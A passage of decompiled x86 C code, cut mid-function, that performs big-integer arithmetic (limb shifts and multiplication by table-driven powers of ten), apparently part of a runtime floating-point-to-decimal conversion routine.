          														if( *_t166 == 0) {
          															_t1175 = 0;
          															__eflags = 0;
          														} else {
          															_t1175 = _t974 + 1;
          														}
          														_t975 = 0x20;
          														_t1261 = _t1110;
          														__eflags = _t975 - _t1175 - _t1110;
          														_t977 =  &_v460;
          														_v1880 = _t977;
          														_t1219 = _t977;
          														_t171 =  &_v1865;
          														 *_t171 = _t975 - _t1175 - _t1110 > 0;
          														__eflags =  *_t171;
          														while(1) {
          															__eflags = _t1261 - _t1061;
          															if(_t1261 >= _t1061) {
          																_t173 =  &_v1876;
          																 *_t173 = _v1876 & 0x00000000;
          																__eflags =  *_t173;
          															} else {
          																_v1876 =  *_t1219;
          															}
          															_t175 = _t1261 - 1; // 0x0
          															__eflags = _t175 - _t1061;
          															if(_t175 >= _t1061) {
          																_t1176 = 0;
          																__eflags = 0;
          															} else {
          																_t1176 =  *(_t1219 - 4);
          															}
          															_t1219 = _t1219 - 4;
          															_t981 = _v1880;
          															_t1261 = _t1261 - 1;
          															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
          															_v1880 = _t981 - 4;
          															__eflags = _t1261 - 0xffffffff;
          															if(_t1261 == 0xffffffff) {
          																break;
          															}
          															_t1061 = _v472;
          														}
          														__eflags = _v1865;
          														_t1111 = _t1110 - _v1872;
          														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
          														_t1221 = _t1111 >> 5;
          														_v1884 = _t1111;
          														_t1263 = _t1221 << 2;
          														E0020E920(_t1221,  &_v1396, 0, _t1263);
          														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
          														_t805 = _t1221 + 1;
          													}
          													goto L128;
          												}
          											}
          											goto L101;
          										}
          										L128:
          										_v1400 = _t805;
          										_t1064 = 0x1cc;
          										_v936 = _t805;
          										__eflags = _t805 << 2;
          										E0021AA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
          										_t1279 =  &(_t1276[7]);
          									} else {
          										_v1396 = _v1396 & 0x00000000;
          										_t1264 = 2;
          										_v1392 = 0x100000;
          										_v1400 = _t1264;
          										__eflags = _t1061 - _t1264;
          										if(_t1061 != _t1264) {
          											L53:
          											_t992 = _v1872 + 1;
          											_t993 = _t992 & 0x0000001f;
          											_t1114 = 0x20;
          											_v1876 = _t993;
          											_t1223 = _t992 >> 5;
          											_v1872 = _t1223;
          											_v1908 = _t1114 - _t993;
          											_t996 = E0020DDA0(1, _t1114 - _t993, 0);
          											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
          											_t997 = _t996 - 1;
          											_t108 =  &_v1896;
          											 *_t108 = _v1896 & 0x00000000;
          											__eflags =  *_t108;
          											asm("bsr ecx, ecx");
          											_v1884 = _t997;
          											_v1912 =  !_t997;
          											if( *_t108 == 0) {
          												_t1117 = 0;
          												__eflags = 0;
          											} else {
          												_t1117 = _t1116 + 1;
          											}
          											_t999 = 0x20;
          											_t1000 = _t999 - _t1117;
          											_t1181 = _t1061 + _t1223;
          											__eflags = _v1876 - _t1000;
          											_v1892 = _t1181;
          											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
          											__eflags = _t1181 - 0x73;
          											_v1865 = _t1001;
          											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
          											__eflags = _t1181 - 0x73;
          											if(_t1181 != 0x73) {
          												L59:
          												_t1002 = 0;
          												__eflags = 0;
          											} else {
          												__eflags = _t1001;
          												if(_t1001 == 0) {
          													goto L59;
          												} else {
          													_t1002 = 1;
          												}
          											}
          											__eflags = _t1118;
          											if(_t1118 != 0) {
          												L81:
          												__eflags = 0;
          												_t1064 = 0x1cc;
          												_v1400 = 0;
          												_v472 = 0;
          												E0021AA64( &_v468, 0x1cc,  &_v1396, 0);
          												_t1276 =  &(_t1276[4]);
          											} else {
          												__eflags = _t1002;
          												if(_t1002 != 0) {
          													goto L81;
          												} else {
          													_t1119 = 0x72;
          													__eflags = _t1181 - _t1119;
          													if(_t1181 >= _t1119) {
          														_t1181 = _t1119;
          														_v1892 = _t1119;
          													}
          													_t1012 = _t1181;
          													_v1880 = _t1012;
          													__eflags = _t1181 - 0xffffffff;
          													if(_t1181 != 0xffffffff) {
          														_t1182 = _v1872;
          														_t1266 = _t1181 - _t1182;
          														__eflags = _t1266;
          														_t1123 =  &_v468 + _t1266 * 4;
          														_v1888 = _t1123;
          														while(1) {
          															__eflags = _t1012 - _t1182;
          															if(_t1012 < _t1182) {
          																break;
          															}
          															__eflags = _t1266 - _t1061;
          															if(_t1266 >= _t1061) {
          																_t1226 = 0;
          																__eflags = 0;
          															} else {
          																_t1226 =  *_t1123;
          															}
          															__eflags = _t1266 - 1 - _t1061;
          															if(_t1266 - 1 >= _t1061) {
          																_t1017 = 0;
          																__eflags = 0;
          															} else {
          																_t1017 =  *(_t1123 - 4);
          															}
          															_t1020 = _v1880;
          															_t1123 = _v1888 - 4;
          															_v1888 = _t1123;
          															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
          															_t1012 = _t1020 - 1;
          															_t1266 = _t1266 - 1;
          															_v1880 = _t1012;
          															__eflags = _t1012 - 0xffffffff;
          															if(_t1012 != 0xffffffff) {
          																_t1061 = _v472;
          																continue;
          															}
          															break;
          														}
          														_t1181 = _v1892;
          														_t1223 = _v1872;
          														_t1264 = 2;
          													}
          													__eflags = _t1223;
          													if(_t1223 != 0) {
          														__eflags = 0;
          														memset( &_v468, 0, _t1223 << 2);
          														_t1276 =  &(_t1276[3]);
          													}
          													__eflags = _v1865;
          													_t1064 = 0x1cc;
          													if(_v1865 == 0) {
          														_v472 = _t1181;
          													} else {
          														_v472 = _t1181 + 1;
          													}
          												}
          											}
          											_v1392 = _v1392 & 0x00000000;
          											_v1396 = _t1264;
          											_v1400 = 1;
          											_v936 = 1;
          											_push(4);
          										} else {
          											_t1127 = 0;
          											__eflags = 0;
          											while(1) {
          												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
          												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
          													goto L53;
          												}
          												_t1127 = _t1127 + 4;
          												__eflags = _t1127 - 8;
          												if(_t1127 != 8) {
          													continue;
          												} else {
          													_t1023 = _v1872 + 2;
          													_t1024 = _t1023 & 0x0000001f;
          													_t1128 = 0x20;
          													_t1129 = _t1128 - _t1024;
          													_v1888 = _t1024;
          													_t1268 = _t1023 >> 5;
          													_v1876 = _t1268;
          													_v1908 = _t1129;
          													_t1027 = E0020DDA0(1, _t1129, 0);
          													_v1896 = _v1896 & 0x00000000;
          													_t1028 = _t1027 - 1;
          													__eflags = _t1028;
          													asm("bsr ecx, edi");
          													_v1884 = _t1028;
          													_v1912 =  !_t1028;
          													if(_t1028 == 0) {
          														_t1130 = 0;
          														__eflags = 0;
          													} else {
          														_t1130 = _t1129 + 1;
          													}
          													_t1030 = 0x20;
          													_t1031 = _t1030 - _t1130;
          													_t1184 = _t1268 + 2;
          													__eflags = _v1888 - _t1031;
          													_v1880 = _t1184;
          													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
          													__eflags = _t1184 - 0x73;
          													_v1865 = _t1032;
          													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
          													__eflags = _t1184 - 0x73;
          													if(_t1184 != 0x73) {
          														L28:
          														_t1033 = 0;
          														__eflags = 0;
          													} else {
          														__eflags = _t1032;
          														if(_t1032 == 0) {
          															goto L28;
          														} else {
          															_t1033 = 1;
          														}
          													}
          													__eflags = _t1131;
          													if(_t1131 != 0) {
          														L50:
          														__eflags = 0;
          														_t1064 = 0x1cc;
          														_v1400 = 0;
          														_v472 = 0;
          														E0021AA64( &_v468, 0x1cc,  &_v1396, 0);
          														_t1276 =  &(_t1276[4]);
          													} else {
          														__eflags = _t1033;
          														if(_t1033 != 0) {
          															goto L50;
          														} else {
          															_t1134 = 0x72;
          															__eflags = _t1184 - _t1134;
          															if(_t1184 >= _t1134) {
          																_t1184 = _t1134;
          																_v1880 = _t1134;
          															}
          															_t1135 = _t1184;
          															_v1892 = _t1135;
          															__eflags = _t1184 - 0xffffffff;
          															if(_t1184 != 0xffffffff) {
          																_t1185 = _v1876;
          																_t1270 = _t1184 - _t1185;
          																__eflags = _t1270;
          																_t1043 =  &_v468 + _t1270 * 4;
          																_v1872 = _t1043;
          																while(1) {
          																	__eflags = _t1135 - _t1185;
          																	if(_t1135 < _t1185) {
          																		break;
          																	}
          																	__eflags = _t1270 - _t1061;
          																	if(_t1270 >= _t1061) {
          																		_t1232 = 0;
          																		__eflags = 0;
          																	} else {
          																		_t1232 =  *_t1043;
          																	}
          																	__eflags = _t1270 - 1 - _t1061;
          																	if(_t1270 - 1 >= _t1061) {
          																		_t1045 = 0;
          																		__eflags = 0;
          																	} else {
          																		_t1045 =  *(_v1872 - 4);
          																	}
          																	_t1140 = _v1892;
          																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
          																	_t1135 = _t1140 - 1;
          																	_t1270 = _t1270 - 1;
          																	_t1043 = _v1872 - 4;
          																	_v1892 = _t1135;
          																	_v1872 = _t1043;
          																	__eflags = _t1135 - 0xffffffff;
          																	if(_t1135 != 0xffffffff) {
          																		_t1061 = _v472;
          																		continue;
          																	}
          																	break;
          																}
          																_t1184 = _v1880;
          																_t1268 = _v1876;
          															}
          															__eflags = _t1268;
          															if(_t1268 != 0) {
          																__eflags = 0;
          																memset( &_v468, 0, _t1268 << 2);
          																_t1276 =  &(_t1276[3]);
          															}
          															__eflags = _v1865;
          															_t1064 = 0x1cc;
          															if(_v1865 == 0) {
          																_v472 = _t1184;
          															} else {
          																_v472 = _t1184 + 1;
          															}
          														}
          													}
          													_v1392 = _v1392 & 0x00000000;
          													_t1038 = 4;
          													__eflags = 1;
          													_v1396 = _t1038;
          													_v1400 = 1;
          													_v936 = 1;
          													_push(_t1038);
          												}
          												goto L52;
          											}
          											goto L53;
          										}
          										L52:
          										_push( &_v1396);
          										_push(_t1064);
          										_push( &_v932);
          										E0021AA64();
          										_t1279 =  &(_t1276[4]);
          									}
          									_t810 = _v1904;
          									_t1084 = 0xa;
          									_v1912 = _t1084;
          									__eflags = _t810;
          									if(_t810 < 0) {
          										_t811 =  ~_t810;
          										_t812 = _t811 / _t1084;
          										_v1880 = _t812;
          										_t1085 = _t811 % _t1084;
          										_v1884 = _t1085;
          										__eflags = _t812;
          										if(_t812 == 0) {
          											L249:
          											__eflags = _t1085;
          											if(_t1085 != 0) {
          												_t849 =  *(0x226a9c + _t1085 * 4);
          												_v1896 = _t849;
          												__eflags = _t849;
          												if(_t849 == 0) {
          													L260:
          													__eflags = 0;
          													_push(0);
          													_v472 = 0;
          													_v2408 = 0;
          													goto L261;
          												} else {
          													__eflags = _t849 - 1;
          													if(_t849 != 1) {
          														_t1096 = _v472;
          														__eflags = _t1096;
          														if(_t1096 != 0) {
          															_t1201 = 0;
          															_t1250 = 0;
          															__eflags = 0;
          															do {
          																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
          																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
          																_t849 = _v1896;
          																asm("adc edx, 0x0");
          																_t1250 = _t1250 + 1;
          																_t1201 = _t1155;
          																__eflags = _t1250 - _t1096;
          															} while (_t1250 != _t1096);
          															__eflags = _t1201;
          															if(_t1201 != 0) {
          																_t856 = _v472;
          																__eflags = _t856 - 0x73;
          																if(_t856 >= 0x73) {
          																	goto L260;
          																} else {
          																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
          																	_v472 = _v472 + 1;
          																}
          															}
          														}
          													}
          												}
          											}
          										} else {
          											do {
          												__eflags = _t812 - 0x26;
          												if(_t812 > 0x26) {
          													_t812 = 0x26;
          												}
          												_t1097 =  *(0x226a06 + _t812 * 4) & 0x000000ff;
          												_v1872 = _t812;
          												_v1400 = ( *(0x226a06 + _t812 * 4) & 0x000000ff) + ( *(0x226a07 + _t812 * 4) & 0x000000ff);
          												E0020E920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
          												_t867 = E0020EA80( &(( &_v1396)[_t1097]), 0x226100 + ( *(0x226a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x226a07 + _t812 * 4) & 0x000000ff) << 2);
          												_t1098 = _v1400;
          												_t1279 =  &(_t1279[6]);
          												_v1892 = _t1098;
          												__eflags = _t1098 - 1;
          												if(_t1098 > 1) {
          													__eflags = _v472 - 1;
          													if(_v472 > 1) {
          														__eflags = _t1098 - _v472;
          														_t1204 =  &_v1396;
          														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
          														__eflags = _t868;
          														if(_t868 != 0) {
          															_t1156 =  &_v468;
          														} else {
          															_t1204 =  &_v468;
          															_t1156 =  &_v1396;
          														}
          														_v1908 = _t1156;
          														__eflags = _t868;
          														if(_t868 == 0) {
          															_t1098 = _v472;
          														}
          														_v1876 = _t1098;
          														__eflags = _t868;
          														if(_t868 != 0) {
          															_v1892 = _v472;
          														}
          														_t1157 = 0;
          														_t1252 = 0;
          														_v1864 = 0;
          														__eflags = _t1098;
          														if(_t1098 == 0) {
          															L243:
          															_v472 = _t1157;
          															_t870 = _t1157 << 2;
          															__eflags = _t870;
          															_push(_t870);
          															_t871 =  &_v1860;
          															goto L244;
          														} else {
          															_t1205 = _t1204 -  &_v1860;
          															__eflags = _t1205;
          															_v1928 = _t1205;
          															do {
          																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
          																_v1896 = _t878;
          																__eflags = _t878;
          																if(_t878 != 0) {
          																	_t879 = 0;
          																	_t1206 = 0;
          																	_t1099 = _t1252;
          																	_v1888 = 0;
          																	__eflags = _v1892;
          																	if(_v1892 == 0) {
          																		L240:
          																		__eflags = _t1099 - 0x73;
          																		if(_t1099 == 0x73) {
          																			goto L258;
          																		} else {
          																			_t1205 = _v1928;
          																			_t1098 = _v1876;
          																			goto L242;
          																		}
          																	} else {
          																		while(1) {
          																			__eflags = _t1099 - 0x73;
          																			if(_t1099 == 0x73) {
          																				goto L235;
          																			}
          																			__eflags = _t1099 - _t1157;
          																			if(_t1099 == _t1157) {
          																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
          																				_t891 = _t879 + 1 + _t1252;
          																				__eflags = _t891;
          																				_v1864 = _t891;
          																				_t879 = _v1888;
          																			}
          																			_t886 =  *(_v1908 + _t879 * 4);
          																			asm("adc edx, 0x0");
          																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
          																			asm("adc edx, 0x0");
          																			_t879 = _v1888 + 1;
          																			_t1099 = _t1099 + 1;
          																			_v1888 = _t879;
          																			_t1206 = _t886 * _v1896 >> 0x20;
          																			_t1157 = _v1864;
          																			__eflags = _t879 - _v1892;
          																			if(_t879 != _v1892) {
          																				continue;
          																			} else {
          																				goto L235;
          																			}
          																			while(1) {
          																				L235:
          																				__eflags = _t1206;
          																				if(_t1206 == 0) {
          																					goto L240;
          																				}
          																				__eflags = _t1099 - 0x73;
          																				if(_t1099 == 0x73) {
          																					goto L258;
          																				} else {
          																					__eflags = _t1099 - _t1157;
          																					if(_t1099 == _t1157) {
          																						_t558 = _t1273 + _t1099 * 4 - 0x740;
          																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
          																						__eflags =  *_t558;
          																						_t564 = _t1099 + 1; // 0x1
          																						_v1864 = _t564;
          																					}
          																					_t884 = _t1206;
          																					_t1206 = 0;
          																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
          																					_t1157 = _v1864;
          																					asm("adc edi, edi");
          																					_t1099 = _t1099 + 1;
          																					continue;
          																				}
          																				goto L246;
          																			}
          																			goto L240;
          																		}
          																		goto L235;
          																	}
          																} else {
          																	__eflags = _t1252 - _t1157;
          																	if(_t1252 == _t1157) {
          																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
          																		_t526 = _t1252 + 1; // 0x1
          																		_t1157 = _t526;
          																		_v1864 = _t1157;
          																	}
          																	goto L242;
          																}
          																goto L246;
          																L242:
          																_t1252 = _t1252 + 1;
          																__eflags = _t1252 - _t1098;
          															} while (_t1252 != _t1098);
          															goto L243;
          														}
          													} else {
          														_t1207 = _v468;
          														_v472 = _t1098;
          														E0021AA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
          														_t1279 =  &(_t1279[4]);
          														__eflags = _t1207;
          														if(_t1207 == 0) {
          															goto L203;
          														} else {
          															__eflags = _t1207 - 1;
          															if(_t1207 == 1) {
          																goto L245;
          															} else {
          																__eflags = _v472;
          																if(_v472 == 0) {
          																	goto L245;
          																} else {
          																	_t1100 = 0;
          																	_v1896 = _v472;
          																	_t1253 = 0;
          																	__eflags = 0;
          																	do {
          																		_t900 = _t1207;
          																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
          																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
          																		asm("adc edx, 0x0");
          																		_t1253 = _t1253 + 1;
          																		_t1100 = _t1158;
          																		__eflags = _t1253 - _v1896;
          																	} while (_t1253 != _v1896);
          																	goto L208;
          																}
          															}
          														}
          													}
          												} else {
          													_t1208 = _v1396;
          													__eflags = _t1208;
          													if(_t1208 != 0) {
          														__eflags = _t1208 - 1;
          														if(_t1208 == 1) {
          															goto L245;
          														} else {
          															__eflags = _v472;
          															if(_v472 == 0) {
          																goto L245;
          															} else {
          																_t1101 = 0;
          																_v1896 = _v472;
          																_t1254 = 0;
          																__eflags = 0;
          																do {
          																	_t905 = _t1208;
          																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
          																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
          																	asm("adc edx, 0x0");
          																	_t1254 = _t1254 + 1;
          																	_t1101 = _t1159;
          																	__eflags = _t1254 - _v1896;
          																} while (_t1254 != _v1896);
          																L208:
          																__eflags = _t1100;
          																if(_t1100 == 0) {
          																	goto L245;
          																} else {
          																	_t903 = _v472;
          																	__eflags = _t903 - 0x73;
          																	if(_t903 >= 0x73) {
          																		L258:
          																		_v2408 = 0;
          																		_v472 = 0;
          																		E0021AA64( &_v468, _t1064,  &_v2404, 0);
          																		_t1279 =  &(_t1279[4]);
          																		_t874 = 0;
          																	} else {
          																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
          																		_v472 = _v472 + 1;
          																		goto L245;
          																	}
          																}
          															}
          														}
          													} else {
          														L203:
          														_v2408 = 0;
          														_v472 = 0;
          														_push(0);
          														_t871 =  &_v2404;
          														L244:
          														_push(_t871);
          														_push(_t1064);
          														_push( &_v468);
          														E0021AA64();
          														_t1279 =  &(_t1279[4]);
          														L245:
          														_t874 = 1;
          													}
          												}
          												L246:
          												__eflags = _t874;
          												if(_t874 == 0) {
          													_v2408 = _v2408 & 0x00000000;
          													_v472 = _v472 & 0x00000000;
          													_push(0);
          													L261:
          													_push( &_v2404);
          													_t852 =  &_v468;
          													goto L262;
          												} else {
          													goto L247;
          												}
          												goto L263;
          												L247:
          												_t812 = _v1880 - _v1872;
          												__eflags = _t812;
          												_v1880 = _t812;
          											} while (_t812 != 0);
          											_t1085 = _v1884;
          											goto L249;
          										}
          									} else {
          										_t908 = _t810 / _t1084;
          										_v1908 = _t908;
          										_t1102 = _t810 % _t1084;
          										_v1896 = _t1102;
          										__eflags = _t908;
          										if(_t908 == 0) {
          											L184:
          											__eflags = _t1102;
          											if(_t1102 != 0) {
          												_t1209 =  *(0x226a9c + _t1102 * 4);
          												__eflags = _t1209;
          												if(_t1209 != 0) {
          													__eflags = _t1209 - 1;
          													if(_t1209 != 1) {
          														_t909 = _v936;
          														_v1896 = _t909;
          														__eflags = _t909;
          														if(_t909 != 0) {
          															_t1255 = 0;
          															_t1103 = 0;
          															__eflags = 0;
          															do {
          																_t910 = _t1209;
          																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
          																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
          																asm("adc edx, 0x0");
          																_t1103 = _t1103 + 1;
          																_t1255 = _t1163;
          																__eflags = _t1103 - _v1896;
          															} while (_t1103 != _v1896);
          															__eflags = _t1255;
          															if(_t1255 != 0) {
          																_t913 = _v936;
          																__eflags = _t913 - 0x73;
          																if(_t913 >= 0x73) {
          																	goto L186;
          																} else {
          																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
          																	_v936 = _v936 + 1;
          																}
          															}
          														}
          													}
          												} else {
          													L186:
          													_v2408 = 0;
          													_v936 = 0;
          													_push(0);
          													goto L190;
          												}
          											}
          										} else {
          											do {
          												__eflags = _t908 - 0x26;
          												if(_t908 > 0x26) {
          													_t908 = 0x26;
          												}
          												_t1104 =  *(0x226a06 + _t908 * 4) & 0x000000ff;
          												_v1888 = _t908;
          												_v1400 = ( *(0x226a06 + _t908 * 4) & 0x000000ff) + ( *(0x226a07 + _t908 * 4) & 0x000000ff);
          												E0020E920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
          												_t926 = E0020EA80( &(( &_v1396)[_t1104]), 0x226100 + ( *(0x226a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x226a07 + _t908 * 4) & 0x000000ff) << 2);
          												_t1105 = _v1400;
          												_t1279 =  &(_t1279[6]);
          												_v1892 = _t1105;
          												__eflags = _t1105 - 1;
          												if(_t1105 > 1) {
          													__eflags = _v936 - 1;
          													if(_v936 > 1) {
          														__eflags = _t1105 - _v936;
          														_t1212 =  &_v1396;
          														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
          														__eflags = _t927;
          														if(_t927 != 0) {
          															_t1164 =  &_v932;
          														} else {
          															_t1212 =  &_v932;
          															_t1164 =  &_v1396;
          														}
          														_v1876 = _t1164;
          														__eflags = _t927;
          														if(_t927 == 0) {
          															_t1105 = _v936;
          														}
          														_v1880 = _t1105;
          														__eflags = _t927;
          														if(_t927 != 0) {
          															_v1892 = _v936;
          														}
          														_t1165 = 0;
          														_t1257 = 0;
          														_v1864 = 0;
          														__eflags = _t1105;
          														if(_t1105 == 0) {
          															L177:
          															_v936 = _t1165;
          															_t929 = _t1165 << 2;
          															__eflags = _t929;
          															goto L178;
          														} else {
          															_t1213 = _t1212 -  &_v1860;
          															__eflags = _t1213;
          															_v1928 = _t1213;
          															do {
          																_t937 =  *(_t1273 + _t1213 + _t1257 * 4 - 0x740);
          																_v1884 = _t937;
          																__eflags = _t937;
          																if(_t937 != 0) {
          																	_t938 = 0;
          																	_t1214 = 0;
          																	_t1106 = _t1257;
          																	_v1872 = 0;
          																	__eflags = _v1892;
          																	if(_v1892 == 0) {
          																		L174:
          																		__eflags = _t1106 - 0x73;
          																		if(_t1106 == 0x73) {
          																			goto L187;
          																		} else {
          																			_t1213 = _v1928;
          																			_t1105 = _v1880;
          																			goto L176;
          																		}
          																	} else {
          																		while(1) {
          																			__eflags = _t1106 - 0x73;
          																			if(_t1106 == 0x73) {
          																				goto L169;
          																			}
          																			__eflags = _t1106 - _t1165;
          																			if(_t1106 == _t1165) {
          																				 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
          																				_t950 = _t938 + 1 + _t1257;
          																				__eflags = _t950;
          																				_v1864 = _t950;
          																				_t938 = _v1872;
          																			}
          																			_t945 =  *(_v1876 + _t938 * 4);
          																			asm("adc edx, 0x0");
          																			 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1214;
          																			asm("adc edx, 0x0");
          																			_t938 = _v1872 + 1;
          																			_t1106 = _t1106 + 1;
          																			_v1872 = _t938;
          																			_t1214 = _t945 * _v1884 >> 0x20;
          																			_t1165 = _v1864;
          																			__eflags = _t938 - _v1892;
          																			if(_t938 != _v1892) {
          																				continue;
          																			} else {
          																				goto L169;
          																			}
          																			while(1) {
          																				L169:
          																				__eflags = _t1214;
          																				if(_t1214 == 0) {
          																					goto L174;
          																				}
          																				__eflags = _t1106 - 0x73;
          																				if(_t1106 == 0x73) {
          																					L187:
          																					__eflags = 0;
          																					_v2408 = 0;
          																					_v936 = 0;
          																					_push(0);
          																					_t940 =  &_v2404;
          																					goto L188;
          																				} else {
          																					__eflags = _t1106 - _t1165;
          																					if(_t1106 == _t1165) {
          																						_t370 = _t1273 + _t1106 * 4 - 0x740;
          																						 *_t370 =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
          																						__eflags =  *_t370;
          																						_t376 = _t1106 + 1; // 0x1
          																						_v1864 = _t376;
          																					}
          																					_t943 = _t1214;
          																					_t1214 = 0;
          																					 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t943;
          																					_t1165 = _v1864;
          																					asm("adc edi, edi");
          																					_t1106 = _t1106 + 1;
          																					continue;
          																				}
          																				goto L181;
          																			}
          																			goto L174;
          																		}
          																		goto L169;
          																	}
          																} else {
          																	__eflags = _t1257 - _t1165;
          																	if(_t1257 == _t1165) {
          																		 *(_t1273 + _t1257 * 4 - 0x740) =  *(_t1273 + _t1257 * 4 - 0x740) & _t937;
          																		_t338 = _t1257 + 1; // 0x1
          																		_t1165 = _t338;
          																		_v1864 = _t1165;
          																	}
          																	goto L176;
          																}
          																goto L181;
          																L176:
          																_t1257 = _t1257 + 1;
          																__eflags = _t1257 - _t1105;
          															} while (_t1257 != _t1105);
          															goto L177;
          														}
          													} else {
          														_t1215 = _v932;
          														_v936 = _t1105;
          														E0021AA64( &_v932, _t1064,  &_v1396, _t1105 << 2);
          														_t1279 =  &(_t1279[4]);
          														__eflags = _t1215;
          														if(_t1215 != 0) {
          															__eflags = _t1215 - 1;
          															if(_t1215 == 1) {
          																goto L180;
          															} else {
          																__eflags = _v936;
          																if(_v936 == 0) {
          																	goto L180;
          																} else {
          																	_t1107 = 0;
          																	_v1884 = _v936;
          																	_t1258 = 0;
          																	__eflags = 0;
          																	do {
          																		_t958 = _t1215;
          																		_t1166 = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) >> 0x20;
          																		 *(_t1273 + _t1258 * 4 - 0x3a0) = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) + _t1107;
          																		asm("adc edx, 0x0");
          																		_t1258 = _t1258 + 1;
          																		_t1107 = _t1166;
          																		__eflags = _t1258 - _v1884;
          																	} while (_t1258 != _v1884);
          																	goto L149;
          																}
          															}
          														} else {
          															_v1400 = 0;
          															_v936 = 0;
          															_push(0);
          															_t930 =  &_v1396;
          															goto L179;
          														}
          													}
          												} else {
          													_t1216 = _v1396;
          													__eflags = _t1216;
          													if(_t1216 != 0) {
          														__eflags = _t1216 - 1;
          														if(_t1216 == 1) {
          															goto L180;
          														} else {
          															__eflags = _v936;
          															if(_v936 == 0) {
          																goto L180;
          															} else {
          																_t1108 = 0;
          																_v1884 = _v936;
          																_t1259 = 0;
          																__eflags = 0;
          																do {
          																	_t965 = _t1216;
          																	_t1167 = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) >> 0x20;
          																	 *(_t1273 + _t1259 * 4 - 0x3a0) = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) + _t1108;
          																	asm("adc edx, 0x0");
          																	_t1259 = _t1259 + 1;
          																	_t1108 = _t1167;
          																	__eflags = _t1259 - _v1884;
          																} while (_t1259 != _v1884);
          																L149:
          																__eflags = _t1107;
          																if(_t1107 == 0) {
          																	goto L180;
          																} else {
          																	_t961 = _v936;
          																	__eflags = _t961 - 0x73;
          																	if(_t961 < 0x73) {
          																		 *(_t1273 + _t961 * 4 - 0x3a0) = _t1107;
          																		_v936 = _v936 + 1;
          																		goto L180;
          																	} else {
          																		_v1400 = 0;
          																		_v936 = 0;
          																		_push(0);
          																		_t940 =  &_v1396;
          																		L188:
          																		_push(_t940);
          																		_push(_t1064);
          																		_push( &_v932);
          																		E0021AA64();
          																		_t1279 =  &(_t1279[4]);
          																		_t933 = 0;
          																	}
          																}
          															}
          														}
          													} else {
          														_t929 = 0;
          														_v1864 = 0;
          														_v936 = 0;
          														L178:
          														_push(_t929);
          														_t930 =  &_v1860;
          														L179:
          														_push(_t930);
          														_push(_t1064);
          														_push( &_v932);
          														E0021AA64();
          														_t1279 =  &(_t1279[4]);
          														L180:
          														_t933 = 1;
          													}
          												}
          												L181:
          												__eflags = _t933;
          												if(_t933 == 0) {
          													_v2408 = _v2408 & 0x00000000;
          													_t404 =  &_v936;
          													 *_t404 = _v936 & 0x00000000;
          													__eflags =  *_t404;
          													_push(0);
          													L190:
          													_push( &_v2404);
          													_t852 =  &_v932;
          													L262:
          													_push(_t1064);
          													_push(_t852);
          													E0021AA64();
          													_t1279 =  &(_t1279[4]);
          												} else {
          													goto L182;
          												}
          												goto L263;
          												L182:
          												_t908 = _v1908 - _v1888;
          												__eflags = _t908;
          												_v1908 = _t908;
